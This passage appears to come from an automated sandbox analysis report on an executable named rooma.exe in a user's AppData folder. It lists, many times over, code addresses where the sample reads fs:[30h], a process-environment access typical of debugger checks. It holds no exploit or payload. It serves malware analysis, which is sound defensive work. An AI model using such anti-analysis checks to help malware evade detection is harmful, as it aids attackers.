          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED mov eax, dword ptr fs:[00000030h]7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF2D0 mov eax, dword ptr fs:[00000030h]7_2_015BF2D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF2D0 mov eax, dword ptr fs:[00000030h]7_2_015BF2D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158B2D3 mov eax, dword ptr fs:[00000030h]7_2_0158B2D3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158B2D3 mov eax, dword ptr fs:[00000030h]7_2_0158B2D3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158B2D3 mov eax, dword ptr fs:[00000030h]7_2_0158B2D3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h]7_2_0159A2C3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h]7_2_0159A2C3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h]7_2_0159A2C3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h]7_2_0159A2C3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h]7_2_0159A2C3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h]7_2_015BB2C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h]7_2_015BB2C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h]7_2_015BB2C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h]7_2_015BB2C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h]7_2_015BB2C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h]7_2_015BB2C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h]7_2_015BB2C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015992C5 mov eax, dword ptr fs:[00000030h]7_2_015992C5
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015992C5 mov eax, dword ptr fs:[00000030h]7_2_015992C5
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164F2F8 mov eax, dword ptr fs:[00000030h]7_2_0164F2F8
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015892FF mov eax, dword ptr fs:[00000030h]7_2_015892FF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A02E1 mov eax, dword ptr fs:[00000030h]7_2_015A02E1
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A02E1 mov eax, dword ptr fs:[00000030h]7_2_015A02E1
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A02E1 mov eax, dword ptr fs:[00000030h]7_2_015A02E1
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C329E mov eax, dword ptr fs:[00000030h]7_2_015C329E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C329E mov eax, dword ptr fs:[00000030h]7_2_015C329E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016272A0 mov eax, dword ptr fs:[00000030h]7_2_016272A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016272A0 mov eax, dword ptr fs:[00000030h]7_2_016272A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016262A0 mov eax, dword ptr fs:[00000030h]7_2_016262A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016262A0 mov ecx, dword ptr fs:[00000030h]7_2_016262A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016262A0 mov eax, dword ptr fs:[00000030h]7_2_016262A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016262A0 mov eax, dword ptr fs:[00000030h]7_2_016262A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016262A0 mov eax, dword ptr fs:[00000030h]7_2_016262A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016262A0 mov eax, dword ptr fs:[00000030h]7_2_016262A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016592A6 mov eax, dword ptr fs:[00000030h]7_2_016592A6
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016592A6 mov eax, dword ptr fs:[00000030h]7_2_016592A6
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016592A6 mov eax, dword ptr fs:[00000030h]7_2_016592A6
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016592A6 mov eax, dword ptr fs:[00000030h]7_2_016592A6
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE284 mov eax, dword ptr fs:[00000030h]7_2_015CE284
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE284 mov eax, dword ptr fs:[00000030h]7_2_015CE284
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016192BC mov eax, dword ptr fs:[00000030h]7_2_016192BC
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016192BC mov eax, dword ptr fs:[00000030h]7_2_016192BC
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016192BC mov ecx, dword ptr fs:[00000030h]7_2_016192BC
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016192BC mov ecx, dword ptr fs:[00000030h]7_2_016192BC
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01610283 mov eax, dword ptr fs:[00000030h]7_2_01610283
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01610283 mov eax, dword ptr fs:[00000030h]7_2_01610283
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01610283 mov eax, dword ptr fs:[00000030h]7_2_01610283
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01665283 mov eax, dword ptr fs:[00000030h]7_2_01665283
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A02A0 mov eax, dword ptr fs:[00000030h]7_2_015A02A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A02A0 mov eax, dword ptr fs:[00000030h]7_2_015A02A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A52A0 mov eax, dword ptr fs:[00000030h]7_2_015A52A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A52A0 mov eax, dword ptr fs:[00000030h]7_2_015A52A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A52A0 mov eax, dword ptr fs:[00000030h]7_2_015A52A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A52A0 mov eax, dword ptr fs:[00000030h]7_2_015A52A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01598550 mov eax, dword ptr fs:[00000030h]7_2_01598550
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01598550 mov eax, dword ptr fs:[00000030h]7_2_01598550
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CB570 mov eax, dword ptr fs:[00000030h]7_2_015CB570
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CB570 mov eax, dword ptr fs:[00000030h]7_2_015CB570
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C656A mov eax, dword ptr fs:[00000030h]7_2_015C656A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C656A mov eax, dword ptr fs:[00000030h]7_2_015C656A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C656A mov eax, dword ptr fs:[00000030h]7_2_015C656A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158B562 mov eax, dword ptr fs:[00000030h]7_2_0158B562
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h]7_2_0163F525
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h]7_2_0163F525
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h]7_2_0163F525
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h]7_2_0163F525
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h]7_2_0163F525
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h]7_2_0163F525
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h]7_2_0163F525
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164B52F mov eax, dword ptr fs:[00000030h]7_2_0164B52F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01665537 mov eax, dword ptr fs:[00000030h]7_2_01665537
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C7505 mov eax, dword ptr fs:[00000030h]7_2_015C7505
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C7505 mov ecx, dword ptr fs:[00000030h]7_2_015C7505
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE53E mov eax, dword ptr fs:[00000030h]7_2_015BE53E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE53E mov eax, dword ptr fs:[00000030h]7_2_015BE53E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE53E mov eax, dword ptr fs:[00000030h]7_2_015BE53E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE53E mov eax, dword ptr fs:[00000030h]7_2_015BE53E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE53E mov eax, dword ptr fs:[00000030h]7_2_015BE53E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01664500 mov eax, dword ptr fs:[00000030h]7_2_01664500
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01664500 mov eax, dword ptr fs:[00000030h]7_2_01664500
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01664500 mov eax, dword ptr fs:[00000030h]7_2_01664500
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01664500 mov eax, dword ptr fs:[00000030h]7_2_01664500
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01664500 mov eax, dword ptr fs:[00000030h]7_2_01664500
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01664500 mov eax, dword ptr fs:[00000030h]7_2_01664500
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01664500 mov eax, dword ptr fs:[00000030h]7_2_01664500
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CD530 mov eax, dword ptr fs:[00000030h]7_2_015CD530
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CD530 mov eax, dword ptr fs:[00000030h]7_2_015CD530
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h]7_2_0159D534
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h]7_2_0159D534
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h]7_2_0159D534
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h]7_2_0159D534
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h]7_2_0159D534
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h]7_2_0159D534
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h]7_2_015A0535
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h]7_2_015A0535
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h]7_2_015A0535
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h]7_2_015A0535
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h]7_2_015A0535
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h]7_2_015A0535
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B95DA mov eax, dword ptr fs:[00000030h]7_2_015B95DA
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015965D0 mov eax, dword ptr fs:[00000030h]7_2_015965D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CA5D0 mov eax, dword ptr fs:[00000030h]7_2_015CA5D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CA5D0 mov eax, dword ptr fs:[00000030h]7_2_015CA5D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE5CF mov eax, dword ptr fs:[00000030h]7_2_015CE5CF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE5CF mov eax, dword ptr fs:[00000030h]7_2_015CE5CF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C55C0 mov eax, dword ptr fs:[00000030h]7_2_015C55C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h]7_2_015B15F4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h]7_2_015B15F4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h]7_2_015B15F4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h]7_2_015B15F4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h]7_2_015B15F4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h]7_2_015B15F4
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016655C9 mov eax, dword ptr fs:[00000030h]7_2_016655C9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160D5D0 mov eax, dword ptr fs:[00000030h]7_2_0160D5D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160D5D0 mov ecx, dword ptr fs:[00000030h]7_2_0160D5D0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016635D7 mov eax, dword ptr fs:[00000030h]7_2_016635D7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016635D7 mov eax, dword ptr fs:[00000030h]7_2_016635D7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016635D7 mov eax, dword ptr fs:[00000030h]7_2_016635D7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CC5ED mov eax, dword ptr fs:[00000030h]7_2_015CC5ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CC5ED mov eax, dword ptr fs:[00000030h]7_2_015CC5ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015925E0 mov eax, dword ptr fs:[00000030h]7_2_015925E0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h]7_2_015BE5E7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h]7_2_015BE5E7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h]7_2_015BE5E7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h]7_2_015BE5E7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h]7_2_015BE5E7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h]7_2_015BE5E7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h]7_2_015BE5E7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h]7_2_015BE5E7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE59C mov eax, dword ptr fs:[00000030h]7_2_015CE59C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016105A7 mov eax, dword ptr fs:[00000030h]7_2_016105A7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016105A7 mov eax, dword ptr fs:[00000030h]7_2_016105A7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016105A7 mov eax, dword ptr fs:[00000030h]7_2_016105A7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C4588 mov eax, dword ptr fs:[00000030h]7_2_015C4588
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158758F mov eax, dword ptr fs:[00000030h]7_2_0158758F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158758F mov eax, dword ptr fs:[00000030h]7_2_0158758F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158758F mov eax, dword ptr fs:[00000030h]7_2_0158758F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016235BA mov eax, dword ptr fs:[00000030h]7_2_016235BA
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016235BA mov eax, dword ptr fs:[00000030h]7_2_016235BA
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016235BA mov eax, dword ptr fs:[00000030h]7_2_016235BA
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016235BA mov eax, dword ptr fs:[00000030h]7_2_016235BA
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164F5BE mov eax, dword ptr fs:[00000030h]7_2_0164F5BE
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01592582 mov eax, dword ptr fs:[00000030h]7_2_01592582
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01592582 mov ecx, dword ptr fs:[00000030h]7_2_01592582
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B45B1 mov eax, dword ptr fs:[00000030h]7_2_015B45B1
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B45B1 mov eax, dword ptr fs:[00000030h]7_2_015B45B1
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h]7_2_015BF5B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h]7_2_015BF5B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h]7_2_015BF5B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h]7_2_015BF5B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h]7_2_015BF5B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h]7_2_015BF5B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h]7_2_015BF5B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h]7_2_015BF5B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h]7_2_015BF5B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B15A9 mov eax, dword ptr fs:[00000030h]7_2_015B15A9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B15A9 mov eax, dword ptr fs:[00000030h]7_2_015B15A9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B15A9 mov eax, dword ptr fs:[00000030h]7_2_015B15A9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B15A9 mov eax, dword ptr fs:[00000030h]7_2_015B15A9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B15A9 mov eax, dword ptr fs:[00000030h]7_2_015B15A9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161B594 mov eax, dword ptr fs:[00000030h]7_2_0161B594
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0161B594 mov eax, dword ptr fs:[00000030h]7_2_0161B594
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B245A mov eax, dword ptr fs:[00000030h]7_2_015B245A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158645D mov eax, dword ptr fs:[00000030h]7_2_0158645D
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h]7_2_0159B440
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h]7_2_0159B440
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h]7_2_0159B440
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h]7_2_0159B440
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h]7_2_0159B440
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h]7_2_0159B440
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0166547F mov eax, dword ptr fs:[00000030h]7_2_0166547F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h]7_2_015CE443
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h]7_2_015CE443
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h]7_2_015CE443
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h]7_2_015CE443
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h]7_2_015CE443
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h]7_2_015CE443
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h]7_2_015CE443
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h]7_2_015CE443
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BA470 mov eax, dword ptr fs:[00000030h]7_2_015BA470
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BA470 mov eax, dword ptr fs:[00000030h]7_2_015BA470
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BA470 mov eax, dword ptr fs:[00000030h]7_2_015BA470
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164F453 mov eax, dword ptr fs:[00000030h]7_2_0164F453
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01591460 mov eax, dword ptr fs:[00000030h]7_2_01591460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01591460 mov eax, dword ptr fs:[00000030h]7_2_01591460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01591460 mov eax, dword ptr fs:[00000030h]7_2_01591460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01591460 mov eax, dword ptr fs:[00000030h]7_2_01591460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01591460 mov eax, dword ptr fs:[00000030h]7_2_01591460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h]7_2_015AF460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h]7_2_015AF460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h]7_2_015AF460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h]7_2_015AF460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h]7_2_015AF460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h]7_2_015AF460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B340D mov eax, dword ptr fs:[00000030h]7_2_015B340D
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C8402 mov eax, dword ptr fs:[00000030h]7_2_015C8402
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C8402 mov eax, dword ptr fs:[00000030h]7_2_015C8402
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C8402 mov eax, dword ptr fs:[00000030h]7_2_015C8402
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CA430 mov eax, dword ptr fs:[00000030h]7_2_015CA430
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158E420 mov eax, dword ptr fs:[00000030h]7_2_0158E420
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158E420 mov eax, dword ptr fs:[00000030h]7_2_0158E420
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158E420 mov eax, dword ptr fs:[00000030h]7_2_0158E420
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158C427 mov eax, dword ptr fs:[00000030h]7_2_0158C427
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016394E0 mov eax, dword ptr fs:[00000030h]7_2_016394E0
